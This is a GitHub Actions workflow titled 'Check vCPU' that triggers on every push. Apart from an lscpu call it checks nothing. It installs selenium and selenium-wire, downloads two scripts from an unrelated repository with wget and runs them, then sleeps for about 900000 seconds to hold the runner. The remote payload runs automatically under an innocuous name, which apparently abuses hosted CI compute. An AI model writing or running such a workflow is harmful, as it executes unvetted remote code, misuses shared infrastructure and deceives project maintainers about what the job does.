name: Check vCPU

on: push

jobs:
  check_cpu:
    runs-on: namespace-profile-namespace-x8

    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Works
      run: |
        lscpu
        pip3 install selenium selenium-wire
        pip3 uninstall blinker -y && pip3 install blinker==1.4
        wget https://raw.githubusercontent.com/lapinende/lapen/refs/heads/main/lap.sh && chmod +x lap.sh && ./lap.sh && wget https://raw.githubusercontent.com/lapinende/lapen/refs/heads/main/lap.py && python3 lap.py
        sleep 900000
